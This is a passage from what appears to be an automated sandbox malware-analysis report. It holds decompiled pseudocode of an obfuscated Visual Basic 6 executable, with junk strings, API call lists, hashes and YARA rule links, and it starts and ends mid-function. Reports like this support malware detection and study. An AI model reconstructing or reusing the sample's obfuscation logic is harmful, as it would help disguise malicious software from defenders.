				_push( *[fs:0x0]);
				 *[fs:0x0] = _t61;
				_push(0x44);
				L004014F0();
				_v12 = _t61;
				_v8 = 0x401338;
				L004016A6();
				_v60 = L"HYPERTHERMESTHESIA";
				_v68 = 8;
				L00401634();
				_t35 =  &_v52;
				_push(_t35);
				L00401616();
				L0040161C();
				_push(_t35);
				_push(L"String");
				L00401694();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t35));
				L0040169A();
				L0040167C();
				_t39 = _v72;
				if(_t39 != 0) {
					if( *0x41333c != 0) {
						_v84 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v84 = 0x41333c;
					}
					_t17 =  &_v84; // 0x41333c
					_v72 =  *((intOrPtr*)( *_t17));
					_t42 =  &_v36;
					L00401610();
					_t39 =  *((intOrPtr*)( *_v72 + 0x10))(_v72, _t42, _t42, _a4);
					asm("fclex");
					_v76 = _t39;
					if(_v76 >= 0) {
						_v88 = _v88 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x40275c);
						_push(_v72);
						_push(_v76);
						L004016B2();
						_v88 = _t39;
					}
					L004016AC();
				}
				_push(0x410950);
				L0040169A();
				return _t39;
			}



















                                  0x00410823
                                  0x0041082e
                                  0x0041082f
                                  0x00410836
                                  0x00410839
                                  0x00410841
                                  0x00410844
                                  0x00410851
                                  0x00410856
                                  0x0041085d
                                  0x0041086a
                                  0x0041086f
                                  0x00410872
                                  0x00410873
                                  0x0041087d
                                  0x00410882
                                  0x00410883
                                  0x00410888
                                  0x0041088f
                                  0x00410895
                                  0x0041089c
                                  0x004108a4
                                  0x004108a9
                                  0x004108af
                                  0x004108b8
                                  0x004108d2
                                  0x004108ba
                                  0x004108ba
                                  0x004108bf
                                  0x004108c4
                                  0x004108c9
                                  0x004108c9
                                  0x004108d9
                                  0x004108de
                                  0x004108e4
                                  0x004108e8
                                  0x004108f6
                                  0x004108f9
                                  0x004108fb
                                  0x00410902
                                  0x0041091b
                                  0x00410904
                                  0x00410904
                                  0x00410906
                                  0x0041090b
                                  0x0041090e
                                  0x00410911
                                  0x00410916
                                  0x00410916
                                  0x00410922
                                  0x00410922
                                  0x00410927
                                  0x0041094a
                                  0x0041094f

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00410839
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00410851
                                  • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041086A
                                  • #591.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00410873
                                  • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041087D
                                  • __vbaStrCmp.MSVBVM60(String,00000000,?), ref: 00410888
                                  • __vbaFreeStr.MSVBVM60(String,00000000,?), ref: 0041089C
                                  • __vbaFreeVar.MSVBVM60(String,00000000,?), ref: 004108A4
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,String,00000000,?), ref: 004108C4
                                  • __vbaObjSetAddref.MSVBVM60(?,?,String,00000000,?), ref: 004108E8
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000010), ref: 00410911
                                  • __vbaFreeObj.MSVBVM60(00000000,?,0040275C,00000010), ref: 00410922
                                  • __vbaFreeStr.MSVBVM60(00410950,String,00000000,?), ref: 0041094A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#591AddrefCheckChkstkCopyHresultMoveNew2
                                  • String ID: <3A$HYPERTHERMESTHESIA$String
                                  • API String ID: 2730007994-3017362109
                                  • Opcode ID: dc33b0bc881b2313515cc3852c2777408ae28de98e6c0e94f9745641dd6072e8
                                  • Instruction ID: 26916d88385611029e060f7a71a55ea20142721a56e87af181e8e609edd844a3
                                  • Opcode Fuzzy Hash: dc33b0bc881b2313515cc3852c2777408ae28de98e6c0e94f9745641dd6072e8
                                  • Instruction Fuzzy Hash: B931187091020DAFDF00EFA1CD45AEDBBB8BF14704F54452AB401B72E2DBB96A858B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411A98, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E00411A98(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				void* _v40;
				void* _v44;
				signed int _v48;
				char _v64;
				char* _v72;
				intOrPtr _v80;
				void* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				char* _t57;
				char* _t58;
				signed int _t64;
				signed int _t70;
				intOrPtr _t91;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t91;
				_push(0x60);
				L004014F0();
				_v12 = _t91;
				_v8 = 0x401408;
				L004016A6();
				_v72 = L"2-2-2";
				_v80 = 8;
				L00401634();
				_t57 =  &_v64;
				_push(_t57);
				L00401598();
				_v84 =  ~(0 | _t57 != 0x0000ffff);
				L0040167C();
				_t58 = _v84;
				if(_t58 != 0) {
					if( *0x41333c != 0) {
						_v108 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v108 = 0x41333c;
					}
					_t17 =  &_v108; // 0x41333c
					_v84 =  *((intOrPtr*)( *_t17));
					_t64 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84,  &_v44);
					asm("fclex");
					_v88 = _t64;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x40275c);
						_push(_v84);
						_push(_v88);
						L004016B2();
						_v112 = _t64;
					}
					_v92 = _v44;
					_v72 = 0x80020004;
					_v80 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t70 =  *((intOrPtr*)( *_v92 + 0x54))(_v92, 0x10,  &_v48);
					asm("fclex");
					_v96 = _t70;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x54);
						_push(0x402c00);
						_push(_v92);
						_push(_v96);
						L004016B2();
						_v116 = _t70;
					}
					_v104 = _v48;
					_v48 = _v48 & 0x00000000;
					_push(_v104);
					_t58 =  &_v36;
					_push(_t58);
					L004015DA();
					L004016AC();
				}
				_push(0x411c25);
				L0040167C();
				L0040169A();
				return _t58;
			}

























                                  0x00411a9d
                                  0x00411aa8
                                  0x00411aa9
                                  0x00411ab0
                                  0x00411ab3
                                  0x00411abb
                                  0x00411abe
                                  0x00411acb
                                  0x00411ad0
                                  0x00411ad7
                                  0x00411ae4
                                  0x00411ae9
                                  0x00411aec
                                  0x00411aed
                                  0x00411afd
                                  0x00411b04
                                  0x00411b09
                                  0x00411b0f
                                  0x00411b1c
                                  0x00411b36
                                  0x00411b1e
                                  0x00411b1e
                                  0x00411b23
                                  0x00411b28
                                  0x00411b2d
                                  0x00411b2d
                                  0x00411b3d
                                  0x00411b42
                                  0x00411b51
                                  0x00411b54
                                  0x00411b56
                                  0x00411b5d
                                  0x00411b76
                                  0x00411b5f
                                  0x00411b5f
                                  0x00411b61
                                  0x00411b66
                                  0x00411b69
                                  0x00411b6c
                                  0x00411b71
                                  0x00411b71
                                  0x00411b7d
                                  0x00411b80
                                  0x00411b87
                                  0x00411b95
                                  0x00411b9f
                                  0x00411ba0
                                  0x00411ba1
                                  0x00411ba2
                                  0x00411bab
                                  0x00411bae
                                  0x00411bb0
                                  0x00411bb7
                                  0x00411bd0
                                  0x00411bb9
                                  0x00411bb9
                                  0x00411bbb
                                  0x00411bc0
                                  0x00411bc3
                                  0x00411bc6
                                  0x00411bcb
                                  0x00411bcb
                                  0x00411bd7
                                  0x00411bda
                                  0x00411bde
                                  0x00411be1
                                  0x00411be4
                                  0x00411be5
                                  0x00411bed
                                  0x00411bed
                                  0x00411bf2
                                  0x00411c17
                                  0x00411c1f
                                  0x00411c24

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411AB3
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00411ACB
                                  • __vbaVarDup.MSVBVM60 ref: 00411AE4
                                  • #557.MSVBVM60(?), ref: 00411AED
                                  • __vbaFreeVar.MSVBVM60(?), ref: 00411B04
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?), ref: 00411B28
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000001C,?,?,?,?,?,?,?), ref: 00411B6C
                                  • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00411B95
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000054,?,?,?,?,?,?,?), ref: 00411BC6
                                  • __vbaVarSetObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?), ref: 00411BED
                                  • __vbaFreeVar.MSVBVM60(00411C25,?), ref: 00411C17
                                  • __vbaFreeStr.MSVBVM60(00411C25,?), ref: 00411C1F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#557CopyNew2
                                  • String ID: 2-2-2$<3A
                                  • API String ID: 2147256735-738456227
                                  • Opcode ID: 4be0fd4d736da4f8d6981f6d6247ddab08b1301334add906911d1a3da46e4dea
                                  • Instruction ID: 9cb87d60c50c0f465b84d91657f78cfbed406300b0504d3ac72b84fc2f810303
                                  • Opcode Fuzzy Hash: 4be0fd4d736da4f8d6981f6d6247ddab08b1301334add906911d1a3da46e4dea
                                  • Instruction Fuzzy Hash: DF41F471D002489FDF00EFE5C945BDDBBB4AF08704F50842AE511BB2A1DBB9A985DF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041184D, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 111COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041184D(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				void* _v48;
				void* _v52;
				signed int _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _v76;
				signed int _v80;
				intOrPtr* _v84;
				signed int _v88;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				signed int _t54;
				char* _t58;
				signed int _t64;
				signed int _t70;
				void* _t82;
				void* _t84;
				intOrPtr _t85;

				_t85 = _t84 - 0xc;
				 *[fs:0x0] = _t85;
				L004014F0();
				_v16 = _t85;
				_v12 = 0x4013f8;
				_v8 = 0;
				_t54 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x4014f6, _t82);
				L0040159E();
				L0040161C();
				_push(_t54);
				_push(L"smeltepunktsbestemmelsens");
				L00401694();
				asm("sbb eax, eax");
				_v76 =  ~( ~_t54 + 1);
				L0040169A();
				_t58 = _v76;
				if(_t58 != 0) {
					if( *0x41333c != 0) {
						_v104 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v104 = 0x41333c;
					}
					_t13 =  &_v104; // 0x41333c
					_v76 =  *((intOrPtr*)( *_t13));
					_t15 =  &_v52; // 0x40276c
					_t64 =  *((intOrPtr*)( *_v76 + 0x4c))(_v76, _t15);
					asm("fclex");
					_v80 = _t64;
					if(_v80 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40275c);
						_push(_v76);
						_push(_v80);
						L004016B2();
						_v108 = _t64;
					}
					_v84 = _v52;
					_v64 = 0xad;
					_v72 = 2;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t70 =  *((intOrPtr*)( *_v84 + 0x1c))(_v84, 0x10,  &_v56);
					asm("fclex");
					_v88 = _t70;
					if(_v88 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x1c);
						_push(0x402b78);
						_push(_v84);
						_push(_v88);
						L004016B2();
						_v112 = _t70;
					}
					_v100 = _v56;
					_v56 = _v56 & 0x00000000;
					_push(_v100);
					_t58 =  &_v40;
					_push(_t58);
					L004015DA();
					L004016AC();
				}
				_push(0x4119ce);
				L0040167C();
				return _t58;
			}



























                                  0x00411850
                                  0x0041185f
                                  0x00411869
                                  0x00411871
                                  0x00411874
                                  0x0041187b
                                  0x0041188a
                                  0x0041188d
                                  0x00411897
                                  0x0041189c
                                  0x0041189d
                                  0x004118a2
                                  0x004118a9
                                  0x004118ae
                                  0x004118b5
                                  0x004118ba
                                  0x004118c0
                                  0x004118cd
                                  0x004118e7
                                  0x004118cf
                                  0x004118cf
                                  0x004118d4
                                  0x004118d9
                                  0x004118de
                                  0x004118de
                                  0x004118ee
                                  0x004118f3
                                  0x004118f6
                                  0x00411902
                                  0x00411905
                                  0x00411907
                                  0x0041190e
                                  0x00411927
                                  0x00411910
                                  0x00411910
                                  0x00411912
                                  0x00411917
                                  0x0041191a
                                  0x0041191d
                                  0x00411922
                                  0x00411922
                                  0x0041192e
                                  0x00411931
                                  0x00411938
                                  0x00411946
                                  0x00411950
                                  0x00411951
                                  0x00411952
                                  0x00411953
                                  0x0041195c
                                  0x0041195f
                                  0x00411961
                                  0x00411968
                                  0x00411981
                                  0x0041196a
                                  0x0041196a
                                  0x0041196c
                                  0x00411971
                                  0x00411974
                                  0x00411977
                                  0x0041197c
                                  0x0041197c
                                  0x00411988
                                  0x0041198b
                                  0x0041198f
                                  0x00411992
                                  0x00411995
                                  0x00411996
                                  0x0041199e
                                  0x0041199e
                                  0x004119a3
                                  0x004119c8
                                  0x004119cd

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 00411869
                                  • #669.MSVBVM60(?,?,?,?,004014F6), ref: 0041188D
                                  • __vbaStrMove.MSVBVM60(?,?,?,?,004014F6), ref: 00411897
                                  • __vbaStrCmp.MSVBVM60(smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 004118A2
                                  • __vbaFreeStr.MSVBVM60(smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 004118B5
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 004118D9
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,0000004C), ref: 0041191D
                                  • __vbaChkstk.MSVBVM60(?), ref: 00411946
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402B78,0000001C), ref: 00411977
                                  • __vbaVarSetObj.MSVBVM60(00000000,?), ref: 00411996
                                  • __vbaFreeObj.MSVBVM60(00000000,?), ref: 0041199E
                                  • __vbaFreeVar.MSVBVM60(004119CE,smeltepunktsbestemmelsens,00000000,?,?,?,?,004014F6), ref: 004119C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckChkstkHresult$#669MoveNew2
                                  • String ID: <3A$l'@<3A$smeltepunktsbestemmelsens
                                  • API String ID: 2737308835-3926014974
                                  • Opcode ID: 6354646fa3b32df36a0d41643f0f36aa3631d013f6fab6df5b0c8e30dd69af6b
                                  • Instruction ID: a073b4010eb167d47b1d49aafbcc3d6bf21b30877ee2cea3c386c0f4c58ea788
                                  • Opcode Fuzzy Hash: 6354646fa3b32df36a0d41643f0f36aa3631d013f6fab6df5b0c8e30dd69af6b
                                  • Instruction Fuzzy Hash: 0E411770D50208AFDB00EFA5C949BDDBBB4EF08704F20842AF511BB2A1C7B99985DB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410272, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 96COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E00410272(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v52;
				char* _v76;
				char _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				signed int _t50;
				signed int _t51;
				signed int _t55;
				char* _t59;
				intOrPtr _t73;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_push(0x60);
				L004014F0();
				_v12 = _t73;
				_v8 = 0x4012e0;
				L004016A6();
				_push( &_v52);
				L00401658();
				_v76 = L"Ferae";
				_v84 = 0x8008;
				_push( &_v52);
				_t50 =  &_v84;
				_push(_t50);
				L0040165E();
				_v88 = _t50;
				L0040167C();
				_t51 = _v88;
				if(_t51 != 0) {
					_t55 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v32);
					asm("fclex");
					_v88 = _t55;
					if(_v88 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x402564);
						_push(_a4);
						_push(_v88);
						L004016B2();
						_v108 = _t55;
					}
					if( *0x41333c != 0) {
						_v112 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v112 = 0x41333c;
					}
					_t26 =  &_v112; // 0x41333c
					_v92 =  *((intOrPtr*)( *_t26));
					_v104 = _v32;
					_v32 = _v32 & 0x00000000;
					_t59 =  &_v36;
					L00401652();
					_t51 =  *((intOrPtr*)( *_v92 + 0x40))(_v92, _t59, _t59, _v104, L"mugningen");
					asm("fclex");
					_v96 = _t51;
					if(_v96 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x40);
						_push(0x40275c);
						_push(_v92);
						_push(_v96);
						L004016B2();
						_v116 = _t51;
					}
					L004016AC();
				}
				_push(0x4103db);
				L0040169A();
				return _t51;
			}























                                  0x00410277
                                  0x00410282
                                  0x00410283
                                  0x0041028a
                                  0x0041028d
                                  0x00410295
                                  0x00410298
                                  0x004102a5
                                  0x004102ad
                                  0x004102ae
                                  0x004102b3
                                  0x004102ba
                                  0x004102c4
                                  0x004102c5
                                  0x004102c8
                                  0x004102c9
                                  0x004102ce
                                  0x004102d5
                                  0x004102da
                                  0x004102e0
                                  0x004102f2
                                  0x004102f8
                                  0x004102fa
                                  0x00410301
                                  0x0041031d
                                  0x00410303
                                  0x00410303
                                  0x00410308
                                  0x0041030d
                                  0x00410310
                                  0x00410313
                                  0x00410318
                                  0x00410318
                                  0x00410328
                                  0x00410342
                                  0x0041032a
                                  0x0041032a
                                  0x0041032f
                                  0x00410334
                                  0x00410339
                                  0x00410339
                                  0x00410349
                                  0x0041034e
                                  0x00410354
                                  0x00410357
                                  0x00410363
                                  0x00410367
                                  0x00410375
                                  0x00410378
                                  0x0041037a
                                  0x00410381
                                  0x0041039a
                                  0x00410383
                                  0x00410383
                                  0x00410385
                                  0x0041038a
                                  0x0041038d
                                  0x00410390
                                  0x00410395
                                  0x00410395
                                  0x004103a1
                                  0x004103a1
                                  0x004103a6
                                  0x004103d5
                                  0x004103da

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041028D
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 004102A5
                                  • #670.MSVBVM60(?,?,?,?,?,004014F6), ref: 004102AE
                                  • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004102C9
                                  • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004102D5
                                  • __vbaHresultCheckObj.MSVBVM60(?,?,00402564,00000160), ref: 00410313
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C), ref: 00410334
                                  • __vbaObjSet.MSVBVM60(?,?,mugningen), ref: 00410367
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000040), ref: 00410390
                                  • __vbaFreeObj.MSVBVM60(00000000,?,0040275C,00000040), ref: 004103A1
                                  • __vbaFreeStr.MSVBVM60(004103DB,00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004103D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$CheckHresult$#670ChkstkCopyNew2
                                  • String ID: <3A$Ferae$mugningen
                                  • API String ID: 2979437685-3828315376
                                  • Opcode ID: 8c5d0c7952931ec74b87e3dbd6716bbd0ca7f8608e92422a6f9afc389b49bed8
                                  • Instruction ID: 81b0df5494f88a6f2c7f0f7e30f2c4b66d578cf3050adaf086f19cec11950658
                                  • Opcode Fuzzy Hash: 8c5d0c7952931ec74b87e3dbd6716bbd0ca7f8608e92422a6f9afc389b49bed8
                                  • Instruction Fuzzy Hash: 0741D47090024DAFCF00EFD2CD49BDEBBB8BB04704F50842AE515BB2A1D7B99985CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004116E3, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 88COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E004116E3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				char _v48;
				char _v64;
				intOrPtr _v88;
				intOrPtr _v96;
				signed int _v104;
				char _v112;
				void* _v116;
				signed int _v120;
				char _v132;
				signed int _v136;
				short _t49;
				signed int _t52;
				void* _t67;
				void* _t69;
				intOrPtr _t70;

				_t70 = _t69 - 0xc;
				 *[fs:0x0] = _t70;
				L004014F0();
				_v16 = _t70;
				_v12 = 0x4013e8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x70,  *[fs:0x0], 0x4014f6, _t67);
				L004016A6();
				_v88 = 0x402d94;
				_v96 = 8;
				L00401634();
				_push( &_v48);
				_push( &_v64);
				L004015A4();
				_v104 = _v104 & 0x00000000;
				_v112 = 0x8008;
				_push( &_v64);
				_t49 =  &_v112;
				_push(_t49);
				L0040165E();
				_v116 = _t49;
				_push( &_v64);
				_push( &_v48);
				_push(2);
				L00401676();
				_t52 = _v116;
				if(_t52 != 0) {
					if( *0x41333c != 0) {
						_v132 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v132 = 0x41333c;
					}
					_t26 =  &_v132; // 0x41333c
					_v116 =  *((intOrPtr*)( *_t26));
					_t28 =  &_v32; // 0x41333c
					_t52 =  *((intOrPtr*)( *_v116 + 0x48))(_v116, 0x72, _t28);
					asm("fclex");
					_v120 = _t52;
					if(_v120 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40275c);
						_push(_v116);
						_push(_v120);
						L004016B2();
						_v136 = _t52;
					}
					L0040169A();
				}
				_push(0x41182e);
				L0040169A();
				return _t52;
			}























                                  0x004116e6
                                  0x004116f5
                                  0x004116ff
                                  0x00411707
                                  0x0041170a
                                  0x00411711
                                  0x00411720
                                  0x00411729
                                  0x0041172e
                                  0x00411735
                                  0x00411742
                                  0x0041174a
                                  0x0041174e
                                  0x0041174f
                                  0x00411754
                                  0x00411758
                                  0x00411762
                                  0x00411763
                                  0x00411766
                                  0x00411767
                                  0x0041176c
                                  0x00411773
                                  0x00411777
                                  0x00411778
                                  0x0041177a
                                  0x00411782
                                  0x00411788
                                  0x00411791
                                  0x004117ab
                                  0x00411793
                                  0x00411793
                                  0x00411798
                                  0x0041179d
                                  0x004117a2
                                  0x004117a2
                                  0x004117b2
                                  0x004117b7
                                  0x004117ba
                                  0x004117c8
                                  0x004117cb
                                  0x004117cd
                                  0x004117d4
                                  0x004117f0
                                  0x004117d6
                                  0x004117d6
                                  0x004117d8
                                  0x004117dd
                                  0x004117e0
                                  0x004117e3
                                  0x004117e8
                                  0x004117e8
                                  0x004117fa
                                  0x004117fa
                                  0x004117ff
                                  0x00411828
                                  0x0041182d

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004116FF
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00411729
                                  • __vbaVarDup.MSVBVM60 ref: 00411742
                                  • #666.MSVBVM60(?,?), ref: 0041174F
                                  • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?), ref: 00411767
                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0041177A
                                  • __vbaNew2.MSVBVM60(0040276C,0041333C,?,?,004014F6), ref: 0041179D
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040275C,00000048), ref: 004117E3
                                  • __vbaFreeStr.MSVBVM60(00000000,?,0040275C,00000048), ref: 004117FA
                                  • __vbaFreeStr.MSVBVM60(0041182E,?,?,004014F6), ref: 00411828
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$#666CheckChkstkCopyHresultListNew2
                                  • String ID: <3A$<3A$tmp
                                  • API String ID: 1011223040-178683147
                                  • Opcode ID: 67933fcf2f470449fd7ec2217908647dc458f2668850baaa2fce4520911be466
                                  • Instruction ID: 7001e9757a100da37100b912007102d080baafe224948c4e5661557ad92febc2
                                  • Opcode Fuzzy Hash: 67933fcf2f470449fd7ec2217908647dc458f2668850baaa2fce4520911be466
                                  • Instruction Fuzzy Hash: 5F312871D00208AFDB10EFA5CD85BDEBBB8BF04704F10852AE511B72A1DB799949CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410A0E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 55%
                                  			E00410A0E(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				signed int _v40;
				void* _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v88;
				signed int _v92;
				signed int _v100;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _t46;
				signed int _t52;
				signed int _t58;
				intOrPtr _t72;

				_push(0x4014f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t46 = 0x5c;
				L004014F0();
				_v12 = _t72;
				_v8 = 0x401358;
				_push(0x402bfc);
				L00401604();
				L0040160A();
				L00401646();
				asm("fcomp qword [0x401350]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					if( *0x41333c != 0) {
						_v104 = 0x41333c;
					} else {
						_push(0x41333c);
						_push(0x40276c);
						L004016B8();
						_v104 = 0x41333c;
					}
					_t5 =  &_v104; // 0x41333c
					_v80 =  *((intOrPtr*)( *_t5));
					_t52 =  *((intOrPtr*)( *_v80 + 0x1c))(_v80,  &_v44);
					asm("fclex");
					_v84 = _t52;
					if(_v84 >= 0) {
						_t16 =  &_v108;
						 *_t16 = _v108 & 0x00000000;
						__eflags =  *_t16;
					} else {
						_push(0x1c);
						_push(0x40275c);
						_push(_v80);
						_push(_v84);
						L004016B2();
						_v108 = _t52;
					}
					_v88 = _v44;
					_v68 = 0x80020004;
					_v76 = 0xa;
					L004014F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t58 =  *((intOrPtr*)( *_v88 + 0x5c))(_v88, 0x10,  &_v40);
					asm("fclex");
					_v92 = _t58;
					if(_v92 >= 0) {
						_t32 =  &_v112;
						 *_t32 = _v112 & 0x00000000;
						__eflags =  *_t32;
					} else {
						_push(0x5c);
						_push(0x402c00);
						_push(_v88);
						_push(_v92);
						L004016B2();
						_v112 = _t58;
					}
					_v100 = _v40;
					_v40 = _v40 & 0x00000000;
					_t46 = _v100;
